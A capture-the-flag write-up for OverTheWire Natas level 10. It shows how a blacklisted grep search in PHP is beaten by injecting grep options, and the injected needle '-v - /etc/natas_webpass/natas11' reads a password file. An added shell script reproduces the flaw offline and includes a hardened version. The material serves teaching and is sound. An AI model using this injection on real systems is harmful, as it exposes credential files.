BB

technology and craziness.

OverTheWire - Natas - Level 9 → Level 10

Warning: This post contains a solution!
Only continue if:
1.) you want to see a possible alternative solution or
2.) you are stuck and need a hint!

Log in using the given credentials.

URL: http://natas10.natas.labs.overthewire.org
Username: natas10
Password: nOppxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Relevant code from the site sourcecode:

<?
$key = "";

// The search term comes straight from the request (GET or POST).
if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    // Blacklist: only the command separators ; | and & are rejected.
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        // $key is interpolated unquoted into the shell command line.
        passthru("grep -i $key dictionary.txt");
    }
}
?>

This source code is similar to the one from the previous level and is therefore also vulnerable to command injection: the user-controlled needle is interpolated unquoted into a shell command line. The difference is that the characters ;, | and & are rejected, so simple command chaining is no longer possible. Note what the blacklist does not cover: the value is still word-split by the shell, so extra options and file names can be handed to grep itself. There are certainly many ways to solve this level.
The simplest solution is to use the options grep already offers. A look into the man page gave me an idea.

   -v, --invert-match
          Invert the sense of matching, to select non-matching lines.

Because the injected value ends up as grep's arguments, the invert match option helps: grep -v PATTERN prints every line that does not contain PATTERN. If the pattern is a single non-alphanumeric character and an extra file is appended to the argument list, every line of that file that does not contain the character is printed. Why non-alphanumeric? Because the password consists only of the alphanumeric characters a-zA-Z0-9, so such a character is guaranteed not to occur in the password line, and the line is therefore never filtered out.

Putting everything together, the value passed as needle is -v - /etc/natas_webpass/natas11, so the server executes the following command: grep -i -v - /etc/natas_webpass/natas11 dictionary.txt

The non-alphanumeric character used here is a simple dash, which grep takes as the pattern because it is the first argument that is not an option. Since -v inverts the match, grep also prints most of dictionary.txt; because several files are searched, each output line is prefixed with its file name, so the password is found on the line starting with /etc/natas_webpass/natas11:.
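To make the argument injection concrete, here is an added example that is not part of the original post: a POSIX shell script that rebuilds the level's filter and grep call against constructed files (a three-line dictionary.txt and a made-up alphanumeric password file standing in for /etc/natas_webpass/natas11), runs the injected needle from above, extracts the password line from the noisy inverted output, and contrasts it with a quoted grep -- call that the same needle cannot influence. The temp directory, file contents and password value are all constructed here.

```shell
#!/bin/sh
# Added example, not code from the original post: reproduces the grep argument
# injection with constructed files so it runs offline. File names and the
# password value are made up; "$WORK/natas11" stands in for
# /etc/natas_webpass/natas11.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed stand-ins for dictionary.txt and the protected password file.
printf 'apple\nwell-known\nbanana\n' > "$WORK/dictionary.txt"
printf 'AbCdEf0123456789GhIjKlMnOpQrStUv\n' > "$WORK/natas11"

# Mirrors the level's PHP: reject ; | & and then run grep -i $needle dictionary.txt
# with the needle left unquoted, exactly as passthru() receives it.
vulnerable_search() {
    needle=$1
    if printf '%s' "$needle" | grep -q '[;|&]'; then
        echo "Input contains an illegal character!"
        return 0
    fi
    # Unquoted expansion: the shell word-splits the needle into separate
    # arguments, so "-v", "-" and a file name all reach grep as options/operands.
    ( cd "$WORK" && grep -i $needle dictionary.txt ) || true
}

# The injected needle from the writeup: invert the match on a dash (a character
# that cannot occur in an alphanumeric password) and add the password file.
attack_output() {
    vulnerable_search "-v - $WORK/natas11"
}

# grep prefixes each line with its file name when several files are searched,
# so the password is the line starting with the password file's path.
recovered_password() {
    attack_output | grep "^$WORK/natas11:" | cut -d: -f2
}

# Hardened variant: quote the expansion and end option parsing with "--", so
# the whole needle is a single pattern operand and cannot add options or files.
safe_search() {
    needle=$1
    if printf '%s' "$needle" | grep -q '[;|&]'; then
        echo "Input contains an illegal character!"
        return 0
    fi
    ( cd "$WORK" && grep -i -- "$needle" dictionary.txt ) || true
}

echo "vulnerable: recovered password $(recovered_password)"
echo "hardened:   output is '$(safe_search "-v - $WORK/natas11")'"
```

The hardened function shows why the blacklist alone is the wrong fix: the problem is not the three separators but that the shell splits the value into words at all. In the PHP itself the equivalent change is to pass the needle through escapeshellarg() behind a -- argument, or to avoid the shell entirely.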